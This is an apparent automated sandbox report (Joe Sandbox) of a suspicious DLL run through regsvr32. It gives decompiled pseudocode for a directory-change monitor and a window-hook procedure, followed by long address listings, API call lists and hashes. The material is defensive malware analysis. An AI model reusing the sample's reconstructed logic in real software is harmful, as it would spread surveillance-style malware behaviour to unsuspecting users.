												 *(__esp + 0x14) =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
												__ecx = __esp + 0x18;
												__edx = __esp + 0x98;
												 *(__esp + 0x66c) = 1;
												__eax = E1003CBFC(__ebx, __edx, __edx, __esp + 0x18);
												__eflags = __eax;
												if(__eax != 0) {
													__edi = __edi | 0xffffffff;
													__eflags = __edi;
												} else {
													__edi =  *(__esp + 0x94);
												}
												__eax = __esp + 0x18;
												__ecx = __esp + 0x74;
												__eax = E1003CBFC(__ebx, __edx, __esp + 0x74, __esp + 0x18);
												__eflags = __eax;
												if(__eax != 0) {
													__esi = __esi | 0xffffffff;
													__eflags = __esi;
												} else {
													__esi =  *(__esp + 0x74);
												}
												__edx = __esp + 0x18;
												__eax = __esp + 0x50;
												__eax = E1003CBFC(__ebx, __edx, __esp + 0x50, __edx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags = __eax;
												} else {
													__eax =  *(__esp + 0x54);
												}
												_push(__edi);
												_push(__esi);
												__ecx = __esp + 0x20;
												__eax =  *(__ebp + 0x74);
												__esi = __ebp + 0x94;
												__ecx = __esi;
												__eax = E10026562(__ecx, 1, 0,  *(__ebp + 0x74), 0, 0, 0, 0);
												_push(0x10059f18);
												L21:
												_push(2);
												_push(0);
												E1002637C(_t353);
												_t342 = _t367 + 0x124;
												E1002637C(_t353, 0, 3, _t342);
												_t352 =  *((intOrPtr*)(_t367 + 0x14));
												E1002637C(_t353, 0, 1, _t352);
												_t259 = _t352 - 0x10;
												 *((intOrPtr*)(_t367 + 0x664)) = 0xffffffff;
												asm("lock xadd [ecx], edx");
												_t391 = (_t342 | 0xffffffff) - 1;
												L99:
												if(_t391 <= 0) {
													_push(_t259);
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t259)) + 4))))();
												}
												goto L101;
											}
										}
										goto L107;
									case 2:
										__eflags =  *(__ebp + 0x88);
										if(__eflags == 0) {
											goto L101;
										} else {
											 *((intOrPtr*)(__esp + 0x40)) = E1003CEA4(__ecx, __edx, __eflags, 0);
											 *((intOrPtr*)(__esp + 0x44)) = __edx;
											__eax = E100173A6();
											__ecx = 0;
											__eflags = __eax;
											_t142 = __eax != 0;
											__eflags = _t142;
											__ecx = 0 | _t142;
											_t143 = __eax;
											__eax = __ebp;
											__ebp = _t143;
											asm("rol dword [ebp+0x7d840fc9], 0x2");
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										}
										goto L107;
									case 3:
										__eflags =  *(__ebp + 0x84);
										if(__eflags == 0) {
											goto L101;
										} else {
											 *((intOrPtr*)(__esp + 0x28)) = E1003CEA4(__ecx, __edx, __eflags, 0);
											 *((intOrPtr*)(__esp + 0x2c)) = __edx;
											__eax = E100173A6();
											__ecx = 0;
											__eflags = __eax;
											_t110 = __eax != 0;
											__eflags = _t110;
											__ecx = 0 | _t110;
											_t111 = __eax;
											__eax = __ebp;
											__ebp = _t111;
											asm("rol dword [ebp+0x5840fc9], 0x4");
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										}
										goto L107;
									case 4:
										__eflags =  *(__ebp + 0x84);
										if(__eflags == 0) {
											goto L101;
										} else {
											 *(__esp + 0x20) = E1003CEA4(__ecx, __edx, __eflags, 0);
											 *((intOrPtr*)(__esp + 0x24)) = __edx;
											__eax = E100173A6();
											__ecx = 0;
											__eflags = __eax;
											_t79 = __eax != 0;
											__eflags = _t79;
											__ecx = 0 | _t79;
											_t80 = __eax;
											__eax = __ebp;
											__ebp = _t80;
											asm("rol dword [ebp-0x7d7bf037], 0x5");
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										}
										goto L107;
								}
							}
							goto L107;
							L101:
							 *(_t362 + 0x90) =  &( *(_t362 + 0x90)->nLength);
							E10003500(_t362 + 0x74, 0x10058714,  *(_t362 + 0x90));
							_t365 = _t367 + 0xc;
							_t325 = _t365 + 0x50;
						} while (ReadDirectoryChangesW( *(_t362 + 0xec), _t365 + 0x344, 0x228, 1, 0x17f, _t365 + 0x50, 0, 0) != 0);
					}
					goto L102;
				}
				L107:
			}






































                                                                                                                0x10015540
                                                                                                                0x10015540
                                                                                                                0x10015542
                                                                                                                0x1001554d
                                                                                                                0x1001554e
                                                                                                                0x10015554
                                                                                                                0x1001555b
                                                                                                                0x10015562
                                                                                                                0x10015564
                                                                                                                0x10015565
                                                                                                                0x10015566
                                                                                                                0x1001556d
                                                                                                                0x10015575
                                                                                                                0x1001557b
                                                                                                                0x10015598
                                                                                                                0x100155a2
                                                                                                                0x100155ab
                                                                                                                0x100155b1
                                                                                                                0x10015e68
                                                                                                                0x10015e71
                                                                                                                0x10015e79
                                                                                                                0x10015e7a
                                                                                                                0x10015e7c
                                                                                                                0x10015e91
                                                                                                                0x100155b7
                                                                                                                0x100155cc
                                                                                                                0x100155dd
                                                                                                                0x100155e3
                                                                                                                0x100155e3
                                                                                                                0x100155f8
                                                                                                                0x10015604
                                                                                                                0x10015615
                                                                                                                0x10015624
                                                                                                                0x10015626
                                                                                                                0x10015630
                                                                                                                0x10015630
                                                                                                                0x10015637
                                                                                                                0x1001563e
                                                                                                                0x10015641
                                                                                                                0x10015645
                                                                                                                0x1001564e
                                                                                                                0x1001565f
                                                                                                                0x10015666
                                                                                                                0x1001566e
                                                                                                                0x10015677
                                                                                                                0x10015682
                                                                                                                0x1001568a
                                                                                                                0x1001568c
                                                                                                                0x10015690
                                                                                                                0x10015690
                                                                                                                0x10015697
                                                                                                                0x1001569e
                                                                                                                0x100156a1
                                                                                                                0x10015690
                                                                                                                0x100156ac
                                                                                                                0x100156b2
                                                                                                                0x10015cd1
                                                                                                                0x10015cd8
                                                                                                                0x00000000
                                                                                                                0x10015cde
                                                                                                                0x10015ce0
                                                                                                                0x10015ce5
                                                                                                                0x10015ce8
                                                                                                                0x10015cec
                                                                                                                0x10015cf0
                                                                                                                0x10015cf7
                                                                                                                0x10015cf9
                                                                                                                0x10015cfc
                                                                                                                0x10015cfe
                                                                                                                0x00000000
                                                                                                                0x10015d04
                                                                                                                0x10015d10
                                                                                                                0x10015d19
                                                                                                                0x10015d21
                                                                                                                0x10015d2c
                                                                                                                0x10015d31
                                                                                                                0x10015d34
                                                                                                                0x10015d36
                                                                                                                0x10015d41
                                                                                                                0x10015d41
                                                                                                                0x10015d38
                                                                                                                0x10015d38
                                                                                                                0x10015d38
                                                                                                                0x10015d51
                                                                                                                0x10015d56
                                                                                                                0x10015d59
                                                                                                                0x10015d5b
                                                                                                                0x10015d66
                                                                                                                0x10015d66
                                                                                                                0x10015d5d
                                                                                                                0x10015d5d
                                                                                                                0x10015d5d
                                                                                                                0x10015d76
                                                                                                                0x10015d7b
                                                                                                                0x10015d7e
                                                                                                                0x10015d80
                                                                                                                0x10015d8b
                                                                                                                0x10015d8b
                                                                                                                0x10015d82
                                                                                                                0x10015d82
                                                                                                                0x10015d82
                                                                                                                0x10015d8e
                                                                                                                0x10015d8f
                                                                                                                0x10015d9b
                                                                                                                0x10015da3
                                                                                                                0x10015db1
                                                                                                                0x10015dbb
                                                                                                                0x10015dcb
                                                                                                                0x10015ddb
                                                                                                                0x10015de0
                                                                                                                0x10015de9
                                                                                                                0x10015deb
                                                                                                                0x10015df0
                                                                                                                0x10015df9
                                                                                                                0x10015e04
                                                                                                                0x10015e09
                                                                                                                0x00000000
                                                                                                                0x10015e09
                                                                                                                0x10015cfe
                                                                                                                0x100156b8
                                                                                                                0x100156b8
                                                                                                                0x00000000
                                                                                                                0x100156bf
                                                                                                                0x100156c3
                                                                                                                0x00000000
                                                                                                                0x100156c9
                                                                                                                0x100156cb
                                                                                                                0x100156d0
                                                                                                                0x100156d3
                                                                                                                0x100156d7
                                                                                                                0x100156db
                                                                                                                0x100156e4
                                                                                                                0x100156e9
                                                                                                                0x00000000
                                                                                                                0x100156ef
                                                                                                                0x100156fb
                                                                                                                0x10015704
                                                                                                                0x10015709
                                                                                                                0x10015714
                                                                                                                0x10015719
                                                                                                                0x1001571e
                                                                                                                0x10015726
                                                                                                                0x10015726
                                                                                                                0x10015720
                                                                                                                0x10015720
                                                                                                                0x10015720
                                                                                                                0x10015733
                                                                                                                0x10015738
                                                                                                                0x1001573d
                                                                                                                0x10015745
                                                                                                                0x10015745
                                                                                                                0x1001573f
                                                                                                                0x1001573f
                                                                                                                0x1001573f
                                                                                                                0x10015755
                                                                                                                0x1001575a
                                                                                                                0x1001575f
                                                                                                                0x1001576a
                                                                                                                0x1001576a
                                                                                                                0x10015761
                                                                                                                0x10015761
                                                                                                                0x10015761
                                                                                                                0x1001576d
                                                                                                                0x1001576e
                                                                                                                0x1001577a
                                                                                                                0x10015782
                                                                                                                0x10015790
                                                                                                                0x1001579a
                                                                                                                0x1001579f
                                                                                                                0x00000000
                                                                                                                0x1001579f
                                                                                                                0x100156e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100157f2
                                                                                                                0x100157f9
                                                                                                                0x00000000
                                                                                                                0x100157ff
                                                                                                                0x10015809
                                                                                                                0x1001580d
                                                                                                                0x10015811
                                                                                                                0x10015816
                                                                                                                0x10015818
                                                                                                                0x1001581a
                                                                                                                0x1001581d
                                                                                                                0x1001581f
                                                                                                                0x10015e94
                                                                                                                0x10015e99
                                                                                                                0x10015ea5
                                                                                                                0x10015ea6
                                                                                                                0x10015ea8
                                                                                                                0x10015eaa
                                                                                                                0x10015eac
                                                                                                                0x10015ead
                                                                                                                0x10015eae
                                                                                                                0x10015eb0
                                                                                                                0x10015eb3
                                                                                                                0x10015eb5
                                                                                                                0x10015eb6
                                                                                                                0x10015eb7
                                                                                                                0x10015eb8
                                                                                                                0x10015eb9
                                                                                                                0x10015eba
                                                                                                                0x10015ebb
                                                                                                                0x10015ebc
                                                                                                                0x10015ebd
                                                                                                                0x10015ebe
                                                                                                                0x10015ebf
                                                                                                                0x10015ec0
                                                                                                                0x10015ec2
                                                                                                                0x10015ecd
                                                                                                                0x10015ece
                                                                                                                0x10015ecf
                                                                                                                0x10015ed0
                                                                                                                0x10015ed7
                                                                                                                0x10015ed8
                                                                                                                0x10015edc
                                                                                                                0x10015ee2
                                                                                                                0x10015ee4
                                                                                                                0x10015eeb
                                                                                                                0x10015eec
                                                                                                                0x10015ef4
                                                                                                                0x10015ef9
                                                                                                                0x10015f0a
                                                                                                                0x10015f12
                                                                                                                0x10015f14
                                                                                                                0x10015f17
                                                                                                                0x10015f21
                                                                                                                0x10015f24
                                                                                                                0x10015f2f
                                                                                                                0x10015f34
                                                                                                                0x10015f39
                                                                                                                0x10015f3b
                                                                                                                0x10015f41
                                                                                                                0x10015f45
                                                                                                                0x10015f45
                                                                                                                0x10015f4d
                                                                                                                0x10015f59
                                                                                                                0x10015825
                                                                                                                0x10015825
                                                                                                                0x10015827
                                                                                                                0x1001582c
                                                                                                                0x1001582e
                                                                                                                0x10015831
                                                                                                                0x10015835
                                                                                                                0x1001583a
                                                                                                                0x10015842
                                                                                                                0x1001584d
                                                                                                                0x10015855
                                                                                                                0x10015857
                                                                                                                0x10015862
                                                                                                                0x10015862
                                                                                                                0x10015859
                                                                                                                0x10015859
                                                                                                                0x10015859
                                                                                                                0x10015865
                                                                                                                0x1001586a
                                                                                                                0x1001586f
                                                                                                                0x10015877
                                                                                                                0x10015879
                                                                                                                0x10015881
                                                                                                                0x10015881
                                                                                                                0x1001587b
                                                                                                                0x1001587b
                                                                                                                0x1001587b
                                                                                                                0x10015884
                                                                                                                0x10015889
                                                                                                                0x1001588e
                                                                                                                0x10015896
                                                                                                                0x10015898
                                                                                                                0x100158a0
                                                                                                                0x1001589a
                                                                                                                0x1001589a
                                                                                                                0x1001589a
                                                                                                                0x100158a3
                                                                                                                0x100158a4
                                                                                                                0x100158a6
                                                                                                                0x100158b5
                                                                                                                0x100158c6
                                                                                                                0x100158ce
                                                                                                                0x100158d0
                                                                                                                0x100158d5
                                                                                                                0x100157a4
                                                                                                                0x100157a4
                                                                                                                0x100157a6
                                                                                                                0x100157aa
                                                                                                                0x100157af
                                                                                                                0x100157bd
                                                                                                                0x100157c2
                                                                                                                0x100157cd
                                                                                                                0x100157d2
                                                                                                                0x100157d5
                                                                                                                0x100157e6
                                                                                                                0x100157eb
                                                                                                                0x10015e0b
                                                                                                                0x10015e0b
                                                                                                                0x10015e11
                                                                                                                0x10015e15
                                                                                                                0x10015e15
                                                                                                                0x00000000
                                                                                                                0x10015e0b
                                                                                                                0x1001581f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015be4
                                                                                                                0x10015beb
                                                                                                                0x00000000
                                                                                                                0x10015bf1
                                                                                                                0x10015bfb
                                                                                                                0x10015bff
                                                                                                                0x10015c03
                                                                                                                0x10015c08
                                                                                                                0x10015c0a
                                                                                                                0x10015c0c
                                                                                                                0x10015c0c
                                                                                                                0x10015c0c
                                                                                                                0x10015c0d
                                                                                                                0x10015c0d
                                                                                                                0x10015c0d
                                                                                                                0x10015c0e
                                                                                                                0x10015c15
                                                                                                                0x10015c15
                                                                                                                0x10015c15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015a5c
                                                                                                                0x10015a63
                                                                                                                0x00000000
                                                                                                                0x10015a69
                                                                                                                0x10015a73
                                                                                                                0x10015a77
                                                                                                                0x10015a7b
                                                                                                                0x10015a80
                                                                                                                0x10015a82
                                                                                                                0x10015a84
                                                                                                                0x10015a84
                                                                                                                0x10015a84
                                                                                                                0x10015a85
                                                                                                                0x10015a85
                                                                                                                0x10015a85
                                                                                                                0x10015a86
                                                                                                                0x10015a8d
                                                                                                                0x10015a8d
                                                                                                                0x10015a8d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100158df
                                                                                                                0x100158e6
                                                                                                                0x00000000
                                                                                                                0x100158ec
                                                                                                                0x100158f6
                                                                                                                0x100158fa
                                                                                                                0x100158fe
                                                                                                                0x10015903
                                                                                                                0x10015905
                                                                                                                0x10015907
                                                                                                                0x10015907
                                                                                                                0x10015907
                                                                                                                0x10015908
                                                                                                                0x10015908
                                                                                                                0x10015908
                                                                                                                0x10015909
                                                                                                                0x10015910
                                                                                                                0x10015910
                                                                                                                0x10015910
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100156b8
                                                                                                                0x00000000
                                                                                                                0x10015e17
                                                                                                                0x10015e17
                                                                                                                0x10015e2e
                                                                                                                0x10015e39
                                                                                                                0x10015e40
                                                                                                                0x10015e60
                                                                                                                0x100155e3
                                                                                                                0x00000000
                                                                                                                0x100155dd
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,02000000,00000000), ref: 100155A2
                                                                                                                • ReadDirectoryChangesW.KERNEL32 ref: 100155D5
                                                                                                                • _memset.LIBCMT ref: 100155F8
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000063,00000000,00000000), ref: 10015624
                                                                                                                • _memset.LIBCMT ref: 10015666
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000063,00000000,00000000), ref: 1001568A
                                                                                                                • __localtime64_s.LIBCMT ref: 10015714
                                                                                                                • __localtime64_s.LIBCMT ref: 10015733
                                                                                                                • __localtime64_s.LIBCMT ref: 10015755
                                                                                                                • __time64.LIBCMT ref: 10015801
                                                                                                                • __localtime64_s.LIBCMT ref: 1001586F
                                                                                                                • __localtime64_s.LIBCMT ref: 1001588E
                                                                                                                • __localtime64_s.LIBCMT ref: 1001584D
                                                                                                                  • Part of subcall function 1003CBFC: _memset.LIBCMT ref: 1003CC3D
                                                                                                                • __time64.LIBCMT ref: 100156CB
                                                                                                                  • Part of subcall function 1003CEA4: GetSystemTimeAsFileTime.KERNEL32(?), ref: 1003CEAD
                                                                                                                  • Part of subcall function 1003CEA4: __aulldiv.LIBCMT ref: 1003CECD
                                                                                                                • ReadDirectoryChangesW.KERNEL32 ref: 10015E5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s$_memset$ByteChangesCharDirectoryFileMultiReadTimeWide__time64$CreateSystem__aulldiv
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 3191029907-941173414
                                                                                                                • Opcode ID: e71dbc740f024e664c01ea7bef284a5c5423d5538d5568a68f8339887dd9582a
                                                                                                                • Instruction ID: 820a8a13c6e6a38639e8ef58e3aabad2606d5e5cab2837dfce96017240da5163
                                                                                                                • Opcode Fuzzy Hash: e71dbc740f024e664c01ea7bef284a5c5423d5538d5568a68f8339887dd9582a
                                                                                                                • Instruction Fuzzy Hash: DCE1A071644740ABE324CB64DC42F9BB3E8EB84711F144A1CF6599F1D1EBB2EA44CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B5A3 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1001B5A3(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E1003D24F(E10052FD7, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x100172b8);
				 *(_t116 - 0x120) = _t110;
				_t54 = E1002D69C(_t94, 0x10070af4, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1001729E(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E10023187(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x10070efc;
						if( *0x10070efc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x10070ad4;
								if( *0x10070ad4 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10070ad4; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1001B45F);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E1003BB70(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100185B8(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x10070ad4 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1003BD06(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E100231D3(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E10019C57(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001A398);
							__eflags = _t83 - E1001A398;
							if(_t83 != E1001A398) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E10022A6E();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E10018830(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E1003D2D2(_t94, _t105, _t110);
				}
			}



























                                                                                                                0x1001b5a3
                                                                                                                0x1001b5a3
                                                                                                                0x1001b5a3
                                                                                                                0x1001b5ad
                                                                                                                0x1001b5b2
                                                                                                                0x1001b5b5
                                                                                                                0x1001b5b8
                                                                                                                0x1001b5c2
                                                                                                                0x1001b5c8
                                                                                                                0x1001b5cf
                                                                                                                0x1001b5d1
                                                                                                                0x1001b5d4
                                                                                                                0x1001b5da
                                                                                                                0x1001b5dc
                                                                                                                0x1001b5de
                                                                                                                0x1001b5de
                                                                                                                0x1001b5e7
                                                                                                                0x1001b5fc
                                                                                                                0x1001b5fe
                                                                                                                0x1001b601
                                                                                                                0x1001b606
                                                                                                                0x1001b608
                                                                                                                0x1001b60c
                                                                                                                0x1001b612
                                                                                                                0x1001b629
                                                                                                                0x1001b629
                                                                                                                0x1001b630
                                                                                                                0x1001b67d
                                                                                                                0x1001b67d
                                                                                                                0x1001b67f
                                                                                                                0x1001b6e7
                                                                                                                0x1001b6ef
                                                                                                                0x1001b72b
                                                                                                                0x1001b737
                                                                                                                0x1001b73e
                                                                                                                0x1001b770
                                                                                                                0x1001b773
                                                                                                                0x1001b779
                                                                                                                0x1001b77b
                                                                                                                0x1001b77e
                                                                                                                0x1001b786
                                                                                                                0x1001b78d
                                                                                                                0x1001b78f
                                                                                                                0x1001b791
                                                                                                                0x1001b798
                                                                                                                0x1001b7a0
                                                                                                                0x1001b7a2
                                                                                                                0x1001b7a5
                                                                                                                0x1001b7a8
                                                                                                                0x1001b7b6
                                                                                                                0x1001b7b6
                                                                                                                0x1001b7a5
                                                                                                                0x1001b791
                                                                                                                0x1001b7bc
                                                                                                                0x1001b7c2
                                                                                                                0x1001b7ce
                                                                                                                0x1001b7d4
                                                                                                                0x1001b7db
                                                                                                                0x1001b7dd
                                                                                                                0x1001b7e2
                                                                                                                0x1001b7e8
                                                                                                                0x1001b7e8
                                                                                                                0x1001b7e8
                                                                                                                0x1001b7e8
                                                                                                                0x00000000
                                                                                                                0x1001b7ec
                                                                                                                0x00000000
                                                                                                                0x1001b740
                                                                                                                0x1001b6f3
                                                                                                                0x1001b6fe
                                                                                                                0x1001b709
                                                                                                                0x1001b70f
                                                                                                                0x1001b715
                                                                                                                0x1001b716
                                                                                                                0x1001b718
                                                                                                                0x1001b720
                                                                                                                0x1001b723
                                                                                                                0x1001b729
                                                                                                                0x1001b74f
                                                                                                                0x1001b755
                                                                                                                0x1001b757
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b761
                                                                                                                0x1001b765
                                                                                                                0x1001b76a
                                                                                                                0x1001b76e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b76e
                                                                                                                0x00000000
                                                                                                                0x1001b729
                                                                                                                0x1001b687
                                                                                                                0x1001b68c
                                                                                                                0x1001b693
                                                                                                                0x1001b69c
                                                                                                                0x1001b6b2
                                                                                                                0x1001b6b4
                                                                                                                0x1001b6ba
                                                                                                                0x1001b6bc
                                                                                                                0x1001b6be
                                                                                                                0x1001b6be
                                                                                                                0x1001b6c6
                                                                                                                0x1001b6ca
                                                                                                                0x1001b6ce
                                                                                                                0x1001b6d2
                                                                                                                0x1001b6d8
                                                                                                                0x1001b6db
                                                                                                                0x1001b6dd
                                                                                                                0x1001b6dd
                                                                                                                0x00000000
                                                                                                                0x1001b6d2
                                                                                                                0x1001b635
                                                                                                                0x1001b63b
                                                                                                                0x1001b640
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b646
                                                                                                                0x1001b649
                                                                                                                0x1001b64e
                                                                                                                0x1001b65b
                                                                                                                0x1001b65f
                                                                                                                0x1001b665
                                                                                                                0x1001b665
                                                                                                                0x1001b66e
                                                                                                                0x1001b673
                                                                                                                0x1001b676
                                                                                                                0x1001b677
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b677
                                                                                                                0x1001b614
                                                                                                                0x1001b61b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b621
                                                                                                                0x1001b623
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b5e9
                                                                                                                0x1001b5f1
                                                                                                                0x1001b7ee
                                                                                                                0x1001b7f3
                                                                                                                0x1001b7f3

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001B5AD
                                                                                                                  • Part of subcall function 1002D69C: __EH_prolog3.LIBCMT ref: 1002D6A3
                                                                                                                • CallNextHookEx.USER32 ref: 1001B5F1
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 1001B635
                                                                                                                • GlobalGetAtomNameA.KERNEL32 ref: 1001B65F
                                                                                                                • SetWindowLongA.USER32 ref: 1001B6B4
                                                                                                                • _memset.LIBCMT ref: 1001B6FE
                                                                                                                • GetClassLongA.USER32(?,000000E0), ref: 1001B72E
                                                                                                                • GetClassNameA.USER32(?,?,00000100), ref: 1001B74F
                                                                                                                • GetWindowLongA.USER32(?,000000FC), ref: 1001B773
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001B78D
                                                                                                                • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001B798
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001B7A0
                                                                                                                • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001B7A8
                                                                                                                • SetWindowLongA.USER32 ref: 1001B7B6
                                                                                                                • CallNextHookEx.USER32 ref: 1001B7CE
                                                                                                                • UnhookWindowsHookEx.USER32 ref: 1001B7E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
